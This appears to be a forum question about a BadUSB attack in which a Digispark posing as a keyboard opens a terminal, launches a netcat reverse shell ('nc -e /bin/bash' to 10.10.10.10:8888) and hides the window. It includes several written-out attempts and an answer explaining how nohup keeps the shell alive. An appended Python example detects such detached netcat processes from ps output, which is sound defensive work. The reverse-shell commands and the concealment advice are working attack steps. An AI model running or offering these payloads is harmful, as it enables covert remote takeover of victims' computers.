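Scenario: an attacker plugs a USB device that acts as a keyboard into the victim's laptop. The payload opens a terminal, executes a reverse shell and hides the terminal.
Problem: the tests I ran locally (Ubuntu 19.04, with a Digispark as the USB device) are as follows:
1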
terminal A nc -e /bin/bash 10.10.10.10 8888
terminal B nc -vlp 8888
Everything works: I get a shell with a prompt on terminal B, but terminal A is not hidden. So in this case it is useless.
2
terminal A nc -e /bin/bash 10.10.10.10 8888&; disown; exit
terminal B nc -vlp 8888
Terminal B just hangs, while terminal A is hidden. Useless.
3
terminal A nohup nc -e /bin/bash 10.10.10.10 8888&; exit
terminal B nc -vlp 8888
Terminal B just hangs, while terminal A is hidden.
4
terminal A: I open screen, then execute nc -e /bin/bash 10.10.10.10 8888, CTRL^A, then d and finally exit.
terminal B nc -vlp 8888
Using screen, everything works (terminal B receives a working shell and terminal A isn't visible), but I don't want to use screen because it is not installed by default.
QUESTION: is there a way (using preinstalled tools) to hide the terminal without screen but with the same effect?
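When the shell exits, the terminal logs out or closes (depending on what kind of terminal it is) and sends SIGHUP to the controlling process group, which causes nc to exit.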
Using nohup detaches from the terminal and runs nc in its own process group (so it will no longer be in the terminal's controlling process group), so the SIGHUP won't be sent to it.
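
For detection: a netcat process that keeps running after its terminal has closed no longer has a controlling terminal, which ps shows as ? in the TTY column. The following is an added example, not part of the original question or answer. It parses a constructed ps -eo pid,ppid,tty,args snapshot and reports netcat processes started with -e; the sample rows, PIDs and function names are assumptions made for illustration.

```python
# Constructed sample of `ps -eo pid,ppid,tty,args` output (illustrative, not from the post).
SAMPLE_PS = """\
  PID  PPID TT       COMMAND
    1     0 ?        /sbin/init
 1480     1 ?        /lib/systemd/systemd --user
 2050  1480 ?        /usr/lib/gnome-terminal/gnome-terminal-server
 2101  2050 pts/0    bash
 2188  2101 pts/0    nc -vlp 8888
 2290  1480 ?        nc -e /bin/bash 10.10.10.10 8888
 2350  2101 pts/0    nc -e /bin/bash 10.10.10.10 8888
 2411     1 ?        /usr/sbin/sshd -D
"""

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional"}

def parse_ps(text):
    """Turn ps output into {pid: row} dicts, skipping the header line."""
    rows = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 4 or not parts[0].isdigit():
            continue  # ignore blank or malformed lines
        pid, ppid, tty, args = parts
        rows[int(pid)] = {"pid": int(pid), "ppid": int(ppid), "tty": tty, "argv": args.split()}
    return rows

def find_exec_netcat(rows):
    """Report netcat processes started with -e (a program wired to the socket)."""
    findings = []
    for row in rows.values():
        argv = row["argv"]
        if argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES or "-e" not in argv[1:]:
            continue
        i = argv.index("-e")
        parent = rows.get(row["ppid"])
        findings.append({
            "pid": row["pid"],
            # "?" means the process has no controlling terminal.
            "detached": row["tty"] == "?",
            "parent": parent["argv"][0] if parent else None,
            "program": argv[i + 1] if i + 1 < len(argv) else None,
        })
    return sorted(findings, key=lambda f: f["pid"])

if __name__ == "__main__":
    for f in find_exec_netcat(parse_ps(SAMPLE_PS)):
        state = "no controlling terminal" if f["detached"] else "attached to a terminal"
        print(f"pid {f['pid']}: nc -e {f['program']} ({state}, parent {f['parent']})")
```

A plain listener such as nc -vlp 8888 is not reported; only the rows where -e hands a program to the connection are, and the detached flag separates the one that outlived its terminal from the one still tied to pts/0.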